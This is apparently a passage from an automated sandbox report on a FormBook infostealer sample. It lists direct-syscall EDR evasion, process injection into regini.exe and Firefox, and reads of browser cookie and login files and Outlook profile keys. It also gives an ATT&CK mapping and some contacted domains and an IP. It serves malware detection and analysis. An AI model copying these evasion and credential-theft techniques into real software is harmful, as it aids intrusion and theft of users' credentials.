                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CEBFC mov eax, dword ptr fs:[00000030h]11_2_014CEBFC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8BF0 mov eax, dword ptr fs:[00000030h]11_2_014A8BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8BF0 mov eax, dword ptr fs:[00000030h]11_2_014A8BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8BF0 mov eax, dword ptr fs:[00000030h]11_2_014A8BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01554BB0 mov eax, dword ptr fs:[00000030h]11_2_01554BB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01554BB0 mov eax, dword ptr fs:[00000030h]11_2_01554BB0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0BBE mov eax, dword ptr fs:[00000030h]11_2_014B0BBE
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0BBE mov eax, dword ptr fs:[00000030h]11_2_014B0BBE
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0A5B mov eax, dword ptr fs:[00000030h]11_2_014B0A5B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0A5B mov eax, dword ptr fs:[00000030h]11_2_014B0A5B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6A50 mov eax, dword ptr fs:[00000030h]11_2_014A6A50
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DCA6F mov eax, dword ptr fs:[00000030h]11_2_014DCA6F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DCA6F mov eax, dword ptr fs:[00000030h]11_2_014DCA6F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DCA6F mov eax, dword ptr fs:[00000030h]11_2_014DCA6F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151CA72 mov eax, dword ptr fs:[00000030h]11_2_0151CA72
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151CA72 mov eax, dword ptr fs:[00000030h]11_2_0151CA72
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154EA60 mov eax, dword ptr fs:[00000030h]11_2_0154EA60
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152CA11 mov eax, dword ptr fs:[00000030h]11_2_0152CA11
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CEA2E mov eax, dword ptr fs:[00000030h]11_2_014CEA2E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DCA24 mov eax, dword ptr fs:[00000030h]11_2_014DCA24
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DCA38 mov eax, dword ptr fs:[00000030h]11_2_014DCA38
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C4A35 mov eax, dword ptr fs:[00000030h]11_2_014C4A35
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C4A35 mov eax, dword ptr fs:[00000030h]11_2_014C4A35
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F6ACC mov eax, dword ptr fs:[00000030h]11_2_014F6ACC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F6ACC mov eax, dword ptr fs:[00000030h]11_2_014F6ACC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F6ACC mov eax, dword ptr fs:[00000030h]11_2_014F6ACC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0AD0 mov eax, dword ptr fs:[00000030h]11_2_014A0AD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D4AD0 mov eax, dword ptr fs:[00000030h]11_2_014D4AD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D4AD0 mov eax, dword ptr fs:[00000030h]11_2_014D4AD0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DAAEE mov eax, dword ptr fs:[00000030h]11_2_014DAAEE
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DAAEE mov eax, dword ptr fs:[00000030h]11_2_014DAAEE
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AEA80 mov eax, dword ptr fs:[00000030h]11_2_014AEA80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574A80 mov eax, dword ptr fs:[00000030h]11_2_01574A80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8A90 mov edx, dword ptr fs:[00000030h]11_2_014D8A90
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8AA0 mov eax, dword ptr fs:[00000030h]11_2_014A8AA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8AA0 mov eax, dword ptr fs:[00000030h]11_2_014A8AA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F6AA4 mov eax, dword ptr fs:[00000030h]11_2_014F6AA4
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0D59 mov eax, dword ptr fs:[00000030h]11_2_014A0D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0D59 mov eax, dword ptr fs:[00000030h]11_2_014A0D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0D59 mov eax, dword ptr fs:[00000030h]11_2_014A0D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8D59 mov eax, dword ptr fs:[00000030h]11_2_014A8D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8D59 mov eax, dword ptr fs:[00000030h]11_2_014A8D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8D59 mov eax, dword ptr fs:[00000030h]11_2_014A8D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8D59 mov eax, dword ptr fs:[00000030h]11_2_014A8D59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory written: C:\Users\user\Desktop\ZcshRk2lgh.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: NULL target: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: 2860Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"Jump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeQueries volume information: C:\Users\user\Desktop\ZcshRk2lgh.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588751 Sample: ZcshRk2lgh.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 31 www.windsky.click 2->31 33 www.moviebuff.info 2->33 35 13 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 10 ZcshRk2lgh.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\ZcshRk2lgh.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 ZcshRk2lgh.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 EbjRcLZjak.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 regini.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 EbjRcLZjak.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 bpgroup.site 74.48.143.82, 49974, 80 TELUS-3CA Canada 23->37 39 